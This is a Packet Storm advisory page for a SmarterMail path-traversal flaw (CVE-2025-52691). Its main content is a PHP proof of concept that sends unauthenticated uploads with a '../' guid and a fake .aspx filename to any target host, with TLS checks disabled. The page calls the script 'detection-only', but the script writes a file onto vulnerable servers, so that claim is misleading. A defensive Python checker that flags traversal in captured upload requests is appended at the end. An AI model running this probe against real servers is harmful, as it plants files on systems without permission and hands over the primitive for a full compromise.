CVSS: 10 / 10 CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Description
This PHP proof of concept is a detection-only artifact generator for CVE-2025-52691 affecting SmarterMail version 16.3.6989.16341. It sends a crafted multipart upload request to the /api/upload endpoint, leveraging a path traversal condition in the...
Basic Information
ID: PACKETSTORM:215889
Published: Feb 19, 2026 at 00:00
=============================================================================================================================================
| # Title : SmarterMail 16.3.6989.16341 Detection Artifact Generator Unauthenticated Path Traversal vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.smartertools.com/ |
=============================================================================================================================================
[+] Summary: This PHP proof-of-concept is a detection-only artifact generator for CVE-2025-52691 affecting SmarterMail.
It sends a crafted multipart upload request to the /api/upload endpoint, leveraging a path traversal
condition in the contextData GUID to determine whether the target is vulnerable.
The script analyzes HTTP responses and returned JSON keys to classify the target as Vulnerable,
Not Vulnerable (patched), or Unknown, without executing payloads or performing exploitation.
It is intended solely for validation and security assessment purposes.
[+] POC : php poc.php -H https://target.com
<?php
error_reporting(E_ALL);
ini_set('display_errors', 0);
$banner = <<<BANNER
██╗███╗ ██╗██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗██╗ ██╗ █████╗
██║████╗ ██║██╔══██╗██╔═══██╗██║ ██║██╔════╝██║ ██║██║ ██╔╝██╔══██╗
██║██╔██╗ ██║██ █╔╝██║ ██║██║ ██║███████╗███████║█████╔╝ ███████║
██║██║╚██╗██║██╔══██╗██║ ██║██║ ██║╚════██║██╔══██║██╔═██╗ ██╔══██║
██║██║ ╚████║██████╔╝╚██████╔╝╚██████╔╝███████║██║ ██║██║ ██╗██║ ██║
╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝
watchTowr-vs-SmarterMail-CVE-2025-52691.php
(*) CVE-2025-52691 Detection Artifact Generator
BANNER;
// Random alphanumeric marker used to recognise this probe in the server's reply.
function generateRandomName(int $length = 6): string {
    $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $out = '';
    for ($i = 0; $i < $length; $i++) {
        $out .= $chars[random_int(0, strlen($chars) - 1)];
    }
    return $out;
}

// Send one multipart upload to /api/upload and classify the response.
function dag(string $host): void {
    $name = generateRandomName();
    $url = $host . 'api/upload';
    $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(8));

    // Multipart body; the contextData part carries the guid with the traversal sequence.
    $data = "--{$boundary}\r\n";
    $data .= "Content-Disposition: form-data; name=\"context\"\r\n\r\nattachment\r\n";
    $data .= "--{$boundary}\r\n";
    $data .= "Content-Disposition: form-data; name=\"resumableIdentifier\"\r\n\r\nfakeID\r\n";
    $data .= "--{$boundary}\r\n";
    $data .= "Content-Disposition: form-data; name=\"resumableFilename\"\r\n\r\nfakefile.aspx\r\n";
    $data .= "--{$boundary}\r\n";
    $data .= "Content-Disposition: form-data; name=\"contextData\"\r\n\r\n";
    $data .= "{\"guid\":\"dag/../../{$name}\"}\r\n";
    $data .= "--{$boundary}\r\n";
    $data .= "Content-Disposition: form-data; name=\"whatever\"; filename=\"fake.jpg\"\r\n\r\n";
    $data .= "Detection Artifact Generator\r\n";
    $data .= "--{$boundary}--\r\n";

    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => $data,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_HTTPHEADER => [
            "Content-Type: multipart/form-data; boundary={$boundary}",
            "Content-Length: " . strlen($data)
        ],
        // TLS certificate checks are disabled, so the verdict is only as
        // trustworthy as the network path to the host being assessed.
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_TIMEOUT => 15,
    ]);
    $response = curl_exec($ch);
    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    if ($response === false || empty($response)) {
        echo "[!] Request failed\n";
        return;
    }

    // The body may be a JSON document or a JSON string that itself contains JSON.
    $json = json_decode($response, true);
    if (is_string($json)) {
        $json = json_decode($json, true);
    }
    if (!is_array($json)) {
        echo "[+/-] UNKNOWN MESSAGE - please verify manually\n";
        return;
    }

    // HTTP 200 with the random marker echoed in "key": the upload was accepted.
    // The uploaded test file stays on the server and has to be cleaned up.
    if ($httpCode === 200 && isset($json['key']) && is_string($json['key'])) {
        if (stripos($json['key'], $name) !== false) {
            echo "[+] VULNERABLE - file " . basename($json['key']) . " got uploaded\n";
            return;
        }
    }

    // HTTP 400 with INVALID_GUID: the server rejected the guid (patched behaviour).
    if ($httpCode === 400 && ($json['message'] ?? '') === 'INVALID_GUID') {
        echo "[-] NOT VULNERABLE - patch applied (INVALID_GUID)\n";
        return;
    }

    echo "[+/-] UNKNOWN MESSAGE - please verify manually\n";
}

echo $banner;

$options = getopt("H:", ["host:"]);
if (!isset($options['H']) && !isset($options['host'])) {
    echo "Usage : php poc.php -H <host>\n";
    echo "Example: php poc.php -H https://smartermail.lab/\n";
    exit(1);
}

// Normalise the base URL so it ends with exactly one slash.
$host = rtrim($options['H'] ?? $options['host'], '/') . '/';
dag($host);
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
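
[+] Added example (not part of the original advisory or the author's PoC): a request-side check a proxy or log pipeline could run on captured /api/upload bodies, flagging a contextData guid that carries path separators or ".." sequences. The canonical 8-4-4-4-12 GUID format, the verdict labels and the sample requests are assumptions constructed for illustration; SmarterMail's own validation is not shown on this page.

```python
import json
import re
from email.parser import BytesParser

# Assumption: a legitimate guid is canonical 8-4-4-4-12 hex (not taken from the vendor patch).
CANONICAL_GUID = re.compile(r"[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}")

def form_fields(content_type, body):
    """Parse a multipart/form-data body into {field name: text value}."""
    head = b"Content-Type: " + content_type.encode("ascii") + b"\r\n\r\n"
    msg = BytesParser().parsebytes(head + body)
    fields = {}
    if msg.is_multipart():
        for part in msg.get_payload():
            name = part.get_param("name", header="content-disposition")
            if name:
                raw = part.get_payload(decode=True) or b""
                fields[name] = raw.decode("utf-8", "replace").strip()
    return fields

def guid_verdict(content_type, body):
    """Classify the guid inside the contextData form field of one upload request."""
    raw = form_fields(content_type, body).get("contextData")
    if raw is None:
        return "no-contextData"
    try:
        guid = json.loads(raw).get("guid")
    except (ValueError, AttributeError):
        return "malformed"
    if not isinstance(guid, str):
        return "malformed"
    if ".." in guid or "/" in guid or "\\" in guid:
        return "traversal"      # path components inside a value that should be an id
    return "ok" if CANONICAL_GUID.fullmatch(guid) else "non-guid"

# Constructed sample requests (not real traffic).
BOUNDARY = "----ConstructedBoundary01"
CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY

def sample_body(guid):
    fields = [("context", "attachment"), ("contextData", json.dumps({"guid": guid}))]
    out = ""
    for name, value in fields:
        out += f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'
    return (out + f"--{BOUNDARY}--\r\n").encode("ascii")

if __name__ == "__main__":
    for g in ("dag/../../AbC123", "3f2504e0-4f89-11d3-9a0c-0305e82c3301", "not-a-guid"):
        print(g, "->", guid_verdict(CONTENT_TYPE, sample_body(g)))
```

A "traversal" verdict on an inbound /api/upload request is worth alerting on regardless of the server's patch level; "non-guid" is a weaker signal that depends on the format assumption above.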